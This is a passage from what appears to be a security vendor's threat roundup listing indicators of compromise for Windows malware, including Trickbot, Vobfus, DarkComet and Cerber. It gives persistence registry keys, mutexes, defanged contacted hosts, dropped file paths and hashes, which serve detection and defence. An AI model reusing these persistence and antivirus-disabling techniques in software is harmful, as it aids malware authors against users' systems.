\n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\DAOEMNI \nValue Name: Startup ` | 11 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: daoemni ` | 11 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\DAOMNI ` | 9 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\DAOMNI \nValue Name: Impersonate ` | 9 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\DAOMNI \nValue Name: Asynchronous ` | 9 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\DAOMNI \nValue Name: MaxWait ` | 9 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\DAOMNI \nValue Name: DllName ` | 9 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\DAOMNI \nValue Name: Startup ` | 9 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: daomni ` | 9 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\OMNILG ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\OMNILG \nValue Name: Impersonate ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\OMNILG \nValue Name: Asynchronous ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\OMNILG \nValue Name: MaxWait ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\OMNILG \nValue Name: DllName ` | 5 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON\\NOTIFY\\OMNILG \nValue Name: Startup ` | 5 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: omnilg ` | 5 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: syncfx ` | 1 \nMutexes | Occurrences \n---|--- \n`qazwsxedc` | 26 \n`A9ZLO3DAFRVH1WAE` | 25 \n`I106865886KMTX` | 25 \n`IGBIASAARMOAIZ` | 25 \n`J8OSEXAZLIYSQ8J` | 25 \n`LXCV0IMGIXS0RTA1` | 25 \n`TXA19EQZP13A6JTR` | 25 \n`VSHBZL6SWAG0C` | 25 \n`A9MTX7ERFAMKLQ` | 25 \n`3G1S91V5ZA5fB56W` | 1 \n`8AZB70HDFK0WOZIZ` | 1 \n`NHO9AZB7HDK0WAZMM` | 1 \n`PJOQT7WD1SAOM` | 1 \n`PSHZ73VLLOAFB` | 1 \n`VHO9AZB7HDK0WAZMM` | 1 \n`VRK1AlIXBJDA5U3A` | 1 \n`<random, matching '[A-Z0-9]{14}'>` | 1 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`209[.]85[.]144[.]100` | 25 \n`172[.]217[.]7[.]206` | 21 \n`66[.]199[.]229[.]251` | 21 \n`62[.]75[.]222[.]235` | 21 \n`95[.]211[.]230[.]86` | 16 \n`5[.]104[.]230[.]200` | 5 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`w[.]topfealine[.]com` | 20 \n`l[.]topfealine[.]com` | 14 \n`w[.]netzsoflow[.]net` | 5 \n`n[.]netzsoflow[.]net` | 5 \nFiles and or directories created | Occurrences \n---|--- \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 19 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 19 \n`%LOCALAPPDATA%\\daoemni.dll` | 11 \n`%LOCALAPPDATA%\\daomni.dll` | 9 \n`%HOMEPATH%\\Local Settings\\Application Data\\daoemni.dll` | 9 \n`%HOMEPATH%\\Local Settings\\Application Data\\daomni.dll` | 7 \n`%LOCALAPPDATA%\\omnilg.dll` | 5 \n`%HOMEPATH%\\Local Settings\\Application Data\\omnilg.dll` | 5 \n \n#### File Hashes\n\n` 05fc7a5cbd0145db5324d216eca44799f3089ce93b9020b1e79a8ffd074373e9 155931a83c112e3b9ec9e53170bc01f00f627149abb4df90506ff9746420ac33 1e781bec2e81a7ea35b3170ba13b8c383a5b34333bfdf5fb8c8fc2da89c79b47 21b62ce885fbb5ad9b6de7cec0bcfd9af51818e97f79b780457775515a36b3b7 22becfbe5b71e26f87a6f3525a75af422f9c6903873911290bc20f8869bd0b83 281c088b7ad0f9ed61fbdd599ffb2fdcd934a02ad66fe16b1f40c0e668d203fa 2f2e4c912ae939c550ab3d3d9723d562ceff5cd8f120570bf2ca75975d5dada1 32ea5866bda9068d8c0f10f3c50225823254194f89f841483e6dbad2e8227315 35c4024898d064cea42eebd3efe714e031aeb7a5cd685ff8fc55176762a6c5cc 371abc331dd0d9f9ae078efd7b88a60795e6707f1833f3b31675a7e80b96843f 392a1507494a62ddd1ad5f6659487254930dbba1dbcc98b3d0f34a1ab1852128 3e27faf67ebc38dc381617546201dafb570bcabc12d1d85e2088da56262d80e9 40d378b966cecafc1ba06ddfcbfb644fd408f83792e40109cd810914825d6b06 45f55ec75fdc96afb4133334435b00ea598206c9f00094a8ac42bbc37ff64310 50ab0d77e4368f929287ef0fe486712cc615f9a9c3d74f7767a257d2a677e1ae 551411d65a597560b93c303fc3fd0bde366f4fd767a940a127bc35c0e188255f 56873d0e1082711b6e9f7c0dd230fd76963f5fe977002bba0fdd51d320d2480a 57260f19a6a615eba7325d454666b2a3cf05589e4ffd20eb34c67c4493b613d2 5b144acca2679ab8563e70e789ef0026b25dcc3e2f96e651a504ef35d7cfc1ae 6243725e2486608c0266f4b954487310e8b36f092e5172eacf967a37e12c49c1 6a836249f7f7cdaa5c796248b0684f0ca45bfa524148331b8de2e395d5b0b88a 8127c67786fa6bcf2ba3b891d1619f6b2589027d94d0f8b5f10a005a1dcc4df8 8b7e399b092922ae7972799f1d28d1f40bf2c463ec2ac90d332a816c1b307cbd 9b33901eb6a246891da01fba649a7ea058c10fc5865a6610b4627fa53d3c50cb 9db359f9c8d9e4960e5fb5475c4c873b386a522ef9340153966c841e594ea224 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nCloudlock | N/A \nCWS | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nEmail Security | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[![](https://1.bp.blogspot.com/-MEH_qUEI3bc/XdgSxcGd8DI/AAAAAAAAC6g/beSkK_PU_8UaxAmaPrhSHSu31uZL9nlmACLcBGAsYHQ/s400/21b62ce885fbb5ad9b6de7cec0bcfd9af51818e97f79b780457775515a36b3b7_amp.png)](<https://1.bp.blogspot.com/-MEH_qUEI3bc/XdgSxcGd8DI/AAAAAAAAC6g/beSkK_PU_8UaxAmaPrhSHSu31uZL9nlmACLcBGAsYHQ/s1600/21b62ce885fbb5ad9b6de7cec0bcfd9af51818e97f79b780457775515a36b3b7_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.Trickbot-7394707-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SOFTWARE\\MICROSOFT\\SYSTEMCERTIFICATES\\AUTHROOT\\CERTIFICATES\\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 \nValue Name: Blob ` | 3 \nMutexes | Occurrences \n---|--- \n`Global\\316D1C7871E10` | 26 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`117[.]196[.]233[.]100` | 10 \n`94[.]156[.]144[.]74` | 5 \n`78[.]24[.]219[.]9` | 5 \n`45[.]224[.]214[.]34` | 4 \n`103[.]219[.]213[.]102` | 3 \n`212[.]80[.]218[.]144` | 3 \n`216[.]239[.]32[.]21` | 2 \n`62[.]109[.]22[.]2` | 2 \n`107[.]173[.]240[.]221` | 2 \n`144[.]91[.]80[.]253` | 2 \n`51[.]89[.]115[.]110` | 2 \n`176[.]58[.]123[.]25` | 1 \n`116[.]203[.]16[.]95` | 1 \n`52[.]55[.]255[.]113` | 1 \n`69[.]195[.]159[.]158` | 1 \n`177[.]154[.]86[.]145` | 1 \n`66[.]85[.]173[.]57` | 1 \n`5[.]182[.]210[.]254` | 1 \n`117[.]255[.]221[.]135` | 1 \n`185[.]222[.]202[.]25` | 1 \n`195[.]123[.]220[.]155` | 1 \n`117[.]206[.]149[.]29` | 1 \n`170[.]84[.]78[.]224` | 1 \n`91[.]108[.]150[.]213` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ident[.]me` | 1 \n`myexternalip[.]com` | 1 \n`ip[.]anysrc[.]net` | 1 \n`ipecho[.]net` | 1 \n`checkip[.]amazonaws[.]com` | 1 \n`wtfismyip[.]com` | 1 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\cmdcache` | 26 \n`%APPDATA%\\cmdcache\\\u00d1\u0081\u00d1\u2021\u00d0\u00b2.exe` | 26 \n`%System32%\\Tasks\\Command cache application` | 26 \n`%ProgramData%\\\u00d1\u0081\u00d1\u2021\u00d0\u00b2.exe` | 26 \n`%APPDATA%\\cmdcache\\data` | 26 \n`%APPDATA%\\cmdcache\\settings.ini` | 26 \n`%TEMP%\\<random, matching '[a-f0-9]{3,5}'>_appcompat.txt` | 25 \n`%TEMP%\\<random, matching '[A-F0-9]{4,5}'>.dmp` | 25 \n \n#### File Hashes\n\n` 031dba2decd40789db3851d1940275bab98d378ceb410eb661b463adf2410650 07553800c14fabbb3aca709a6d5d7af0b9936504fb3d1406825ba6034e22f97f 0d2da6104e039e429a4bb0f2a27744879a4551cbadb1e4a44de54343a6c0ac6c 218ba8f3d20fbab8eaa94aa7d3aa6ffe417d859bbf6bbd499c1e6211f0292a07 26616609c018bb2081c86a11b1567865a4ee63686eff17f4b7e88b6655ad93eb 2cd5c3baae45b92b8f39f808493a9805f94eed3847b94c853bfb160217225887 2da40b82795dff861dd4bf9025b4fd659e398d894df20ef399c1960fe92de323 334aafa1b9ac0f0d94f690a25ad5841e732de6c0609704e838e8c8ad8986a207 339c9866157b0f51d0fe6c644cd8b485672fdbf16ad5244ceaa7b4eab9d0fd56 33da9747569d5cfa3e42d8a98b8cb941829905cac809428de49e9d011372b3be 3476f50e527ab1558f8a12b20a6d0394045c98b7b352f9703499c54ac13b526a 38548798cfcc55fc8200d3f3482d9eb7eafc14feda2b88b22d143c4fec75a175 3d9bb460763687a31c360beb958abae1a5e10add4fad3b0a9e3fb70aa3803241 3e1762697fe5f1996a8cd224a97bfd47fc2578ac1950d5e177cc17edc4fa9094 4766ae5c1ffdbf142e5c7df792654f591c1ef4df1e7775484d458c2b8237312a 4793182f8a55a7d2df459ea2ef2ed27835bfe43648d78bbe540ecfe9185f4380 48f273faec8a9236fadadcd0b88cc416eab9c4c40b064742213c1e5ed24cc105 4b3ff0afe6f834a9c05354fd2089662e670e9203b864969e0d67bb957af37c43 4cfabac70d45aa70f7e129fcf234ebf84e0edb950380bacf0008616d8059601b 53677c31b06dbf686f019dad8465876ae4e757adf186d02d60a5194106ee20da 5441d28936218f078a094e4b03a60db5f06a890f02ebbbabbf2e4345ef3ed05a 5641e7f156339b3c2d624972d9eea74910e39f0620aed2eadff1fa0635137541 58d92ae7cacfadf7ca36fbabebfa721299c4a828f81707290416639919f0fb20 5953aba170deb68dde4ddd8132b51260167186cdb24a6b42d85edc28eaa49211 5b80b61034467babade5a004fab79adb3d9f18416345c1cdbe6ca0776c9c9513 `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nCloudlock | N/A \nCWS | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nEmail Security | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nNetwork Security | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nUmbrella | N/A \nWSA | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \n \n#### Screenshots of Detection\n\n#### AMP\n\n[![](https://1.bp.blogspot.com/-1RgheslVqP4/XdgS-3RutLI/AAAAAAAAC6k/bSjKvt_b0_4eB2yJg4pr3I1sQKA35w7lwCLcBGAsYHQ/s400/5953aba170deb68dde4ddd8132b51260167186cdb24a6b42d85edc28eaa49211_amp.png)](<https://1.bp.blogspot.com/-1RgheslVqP4/XdgS-3RutLI/AAAAAAAAC6k/bSjKvt_b0_4eB2yJg4pr3I1sQKA35w7lwCLcBGAsYHQ/s1600/5953aba170deb68dde4ddd8132b51260167186cdb24a6b42d85edc28eaa49211_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Worm.Vobfus-7395002-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\ADVANCED \nValue Name: ShowSuperHidden ` | 26 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE\\AU ` | 26 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE\\AU \nValue Name: NoAutoUpdate ` | 26 \n`<HKLM>\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\WINDOWSUPDATE ` | 26 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ciiti ` | 2 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: supej ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: zauuca ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: yxyom ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: wznoid ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: qousu ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: jiigio ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: bmjiif ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: ryhiy ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: caodaap ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: viean ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: beoal ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: fiiisep ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: fuafoop ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: juuso ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: peaceit ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: mbnur ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: zoelie ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: teuemar ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: jomol ` | 1 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: yiozaot ` | 1 \nMutexes | Occurrences \n---|--- \n`A` | 26 \nIP Addresses contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`204[.]11[.]56[.]48` | 26 \n`46[.]166[.]182[.]115` | 13 \n`37[.]48[.]65[.]148` | 11 \n`64[.]32[.]8[.]67` | 7 \n`207[.]244[.]67[.]214/31` | 4 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`ns1[.]anytime2[.]net` | 26 \n`ns1[.]anytime3[.]net` | 26 \n`ns1[.]anytime3[.]org` | 26 \n`ns1[.]anytime2[.]com` | 26 \n`ns1[.]anytime4[.]com` | 26 \n`ns1[.]anytime2[.]org` | 26 \n`ns1[.]anytime1[.]net` | 26 \n`ns1[.]anytime1[.]org` | 26 \n`ns1[.]anytime1[.]com` | 26 \nFiles and or directories created | Occurrences \n---|--- \n`\\autorun.inf` | 26 \n`\\System Volume Information.exe` | 26 \n`\\$RECYCLE.BIN.exe` | 26 \n`\\Secret.exe` | 26 \n`\\Passwords.exe` | 26 \n`\\Porn.exe` | 26 \n`\\Sexy.exe` | 26 \n`E:\\autorun.inf` | 26 \n`E:\\$RECYCLE.BIN.exe` | 26 \n`E:\\Passwords.exe` | 26 \n`E:\\Porn.exe` | 26 \n`E:\\Secret.exe` | 26 \n`E:\\Sexy.exe` | 26 \n`E:\\System Volume Information.exe` | 26 \n`E:\\x.mpeg` | 26 \n`%HOMEPATH%` | 26 \n`%HOMEPATH%\\Passwords.exe` | 26 \n`%HOMEPATH%\\Porn.exe` | 26 \n`%HOMEPATH%\\Secret.exe` | 26 \n`%HOMEPATH%\\Sexy.exe` | 26 \n`%HOMEPATH%\\c` | 26 \n`%HOMEPATH%\\c\\Passwords.exe` | 26 \n`%HOMEPATH%\\c\\Porn.exe` | 26 \n`%HOMEPATH%\\c\\Secret.exe` | 26 \n`%HOMEPATH%\\c\\Sexy.exe` | 26 \n \n*See JSON for more IOCs\n\n#### File Hashes\n\n` 0114132de55fe3391d2ffe1eb2235af64538e704a5d39a7c12a5242b26feff60 024c44316844dd33ee87876a1acf6b823b30f97b8f9b2aa593289df21b0ec1d7 056bf3cca6f0cd4e41ad01e0eb4700bee0271c2bb3334642784920529e2554de 07ee7ffcf647257d1293ad9826c82fc09398f657092c25b21169f87fa5a7c9d4 08169078f447a9671714276fd75f906cd349fb720001a77d78bef56b9e35a233 081aabf461e76026a4b5ce622d7dea97bd5c69bd7f6291bc69325ee9e1b2478b 082ee719168ea7be341b1303d4e62fe30007af27470e269a63aa0b1098e7d488 084b2c416ebeb7c01a099604458bc0851f1e1e8b2f230522898cf4084c803f15 0a1e200b0c26beab5775cfa61c2639ea27157e46781e70cbd78a4b19232b632b 0ad7fb766799dd2f438ba70821e2c7f6b2e08c524fd750b34a6209ab8ac3d480 0b11ae767b606de45c93913ce84153b226eae42d035871a9955f19c4cbb46c7a 0bf91f7b0d81a825f042006243db69eb23d52726c19b335ad42e188c53616d99 0c5f7e0d447a0f9445888ba803a9c6bb223bdee7d982be2f833d6184e754b7b0 0e323827671fd25c7f89c594618623916a4dc60221f405a3f2bf7df0275e4e0d 0eb69de315990b07cdc4e6472f7b1a178412d9730766fddb596bddf5b2576ed1 1396cae157a806641cb34122f34c22b4dc995028686f6a082725e4e335e60aed 13a7e9c873e5e108d28acca607b1689f391c1036db6d977f8602908046ca4739 148a31211653eb50a050446b5556cf02846f957e210725c56cde63b8196384e5 156452ee7c520ac7ef66233c06b2d9bb8faa3c119e9ae697a53695a7f10c3fa3 15b5879a31b9e41872a13caefbff2bc7e4b672beb19a6fbc3c5b5a38774cc13d 16fa24d44c523e35c4c37fc149647d7e6c21d090a047127fc8d68fc6b9ad8a42 1713907f8ca3dc61f966a367d1d65a4dc13e525fc8ce091b2147d3665a3c0c23 193491d849129d8286edd480622bbe6da83f551d6cd8d3eb16c3cc38c21eeacb 1a59da8f0388e798d4ade89f7c880166b72ad576cc87a883568d614df2d0529d 1b1de63ef24f88d5350acd0909ed76b0ee71c7fa327a715bb1ae554feb33837b `\n\n*See JSON for more IOCs\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nCloudlock | N/A \nCWS | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nEmail Security | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nNetwork Security | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nUmbrella | N/A \nWSA | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \n \n#### Screenshots of Detection\n\n#### AMP\n\n[![](https://1.bp.blogspot.com/-MtRhgx6TyoY/XdgTbaoPyeI/AAAAAAAAC60/qk40gWnPJ0Mpojdx8RMats0t2koWDMnJgCLcBGAsYHQ/s400/148a31211653eb50a050446b5556cf02846f957e210725c56cde63b8196384e5_amp.png)](<https://1.bp.blogspot.com/-MtRhgx6TyoY/XdgTbaoPyeI/AAAAAAAAC60/qk40gWnPJ0Mpojdx8RMats0t2koWDMnJgCLcBGAsYHQ/s1600/148a31211653eb50a050446b5556cf02846f957e210725c56cde63b8196384e5_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Malware.DarkComet-7395004-1\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKCU>\\SOFTWARE\\DC3_FEXEC ` | 13 \n`<HKLM>\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINLOGON \nValue Name: UserInit ` | 12 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: Driver ` | 7 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: RealtekHD ` | 3 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: MicroUpdate ` | 2 \nMutexes | Occurrences \n---|--- \n`DC_MUTEX-RL28VNV` | 3 \n`DCMUTEX` | 1 \n`DC_MUTEX-JG8JLJL` | 1 \n`DC_MUTEX-M79BVMN` | 1 \nDomain Names contacted by malware. Does not indicate maliciousness | Occurrences \n---|--- \n`lolmands[.]chickenkiller[.]com` | 4 \nFiles and or directories created | Occurrences \n---|--- \n`%APPDATA%\\MSDCSC` | 7 \n`%APPDATA%\\MSDCSC\\driver` | 7 \n`%APPDATA%\\dclogs` | 4 \n`%ProgramData%\\Microsoft\\Windows\\Start Menu\\MSDCSC` | 3 \n`%ProgramData%\\Microsoft\\Windows\\Start Menu\\MSDCSC\\RealtekHD.exe` | 3 \n`\\Documents and Settings\\All Users\\Start Menu\\MSDCSC\\RealtekHD.exe` | 3 \n`%HOMEPATH%\\My Documents\\MSDCSC\\msdcsc.exe` | 2 \n`%HOMEPATH%\\Documents\\MSDCSC` | 2 \n`%HOMEPATH%\\Documents\\MSDCSC\\msdcsc.exe` | 2 \n`%TEMP%\\RESIM 1.PNG` | 1 \n`%TEMP%\\~PI26.tmp` | 1 \n`%TEMP%\\~PI85.tmp` | 1 \n \n#### File Hashes\n\n` 0316a484966a555a7e369cf49423da28c7cba45bb38d031386ad1e98c7730ed0 30d81a3c924535f64ebb60ffb7c96df278144ec422ea2f7b1905790d2c876619 3a44d9ae2b5508869df06bbf3dc0750f8e4cd8a7a827c95cd24f98966bbbfa38 48d15953b1c2f1e314a6ae3945ccbfd9b3e0fe2d40eea09c8d5f379b07f70866 5027bea06d7037f478ddcfd932cc82f682612e147f00d34d47cbf644453b74df 6289734ecf82dc9496402d9ceae7308819c4bbbb5d85642e8dc5108e8a08c32f 65e95281868c80b645d0276515b8b54fab52fe031a85b96c3e1d29148546bcb4 6c6483db05cbc3e863e3231405f66bc764930e5348800780d50bd1ccf1f869c4 74d2e08ab92859332efc3f97c0ef872979820527cc994c3d4160dd2da4add8e7 a44d66aebc02d8d612038c33bd397bf64097da98676b49315c74b79dd449b142 a7c7b756104d1a98a9daa80a7a591dab8cd210be1cf4a187363e42c23abc5856 be324c43b4b0a4f607e60db1926f4eca349fbb2fb6250da3337f7e94d1ea66c8 f43789df8769817412591e561390f06f9ae94b8047b0afd5b5c74170109729e8 f93f80520ccbba8fa35deb75f50ceba2f54b1ef52589b0c072248786bcef78b0 fa45ff72c498d1af84a96317ecb71a96bd608799d529ae8334d83928dff7b970 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAMP | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nCloudlock | N/A \nCWS | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nEmail Security | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nNetwork Security | N/A \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid | ![This has coverage](https://www.talosintelligence.com/assets/icon_check_white.svg) \nUmbrella | N/A \nWSA | N/A \n \n#### Screenshots of Detection\n\n#### AMP\n\n[![](https://1.bp.blogspot.com/-jBGicerbZyY/XdgT-NyQt3I/AAAAAAAAC68/yDQuF9Lf-UMvFXrQBLWVQWqQAxVoiwGWQCLcBGAsYHQ/s400/30d81a3c924535f64ebb60ffb7c96df278144ec422ea2f7b1905790d2c876619_amp.png)](<https://1.bp.blogspot.com/-jBGicerbZyY/XdgT-NyQt3I/AAAAAAAAC68/yDQuF9Lf-UMvFXrQBLWVQWqQAxVoiwGWQCLcBGAsYHQ/s1600/30d81a3c924535f64ebb60ffb7c96df278144ec422ea2f7b1905790d2c876619_amp.png>)\n\n \n\n\n \n\n\n* * *\n\n### Win.Ransomware.Cerber-7395321-0\n\n#### Indicators of Compromise\n\nRegistry Keys | Occurrences \n---|--- \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER ` | 16 \n`<HKLM>\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER \nValue Name: PendingFileRenameOperations ` | 16 \n`<HKCU>\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN \nValue Name: api-PQEC ` | 5 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 ` | 5 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: {F50EA47E-D053-EF14-82F9-0493D63D7877} ` | 3 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: {6A4DAFE8-C11D-2C5C-9B3E-8520FF528954} ` | 3 \n`<HKCU>\\SOFTWARE\\APPDATALOW\\SOFTWARE\\MICROSOFT\\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 \nValue Name: Client ` | 3 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: AntiVirusOverride ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: AntiVirusDisableNotify ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: FirewallDisableNotify ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: FirewallOverride ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: UpdatesDisableNotify ` | 2 \n`<HKLM>\\SOFTWARE\\WOW6432NODE\\MICROSOFT\\SECURITY CENTER \nValue Name: UacDisableNotify ` | 2 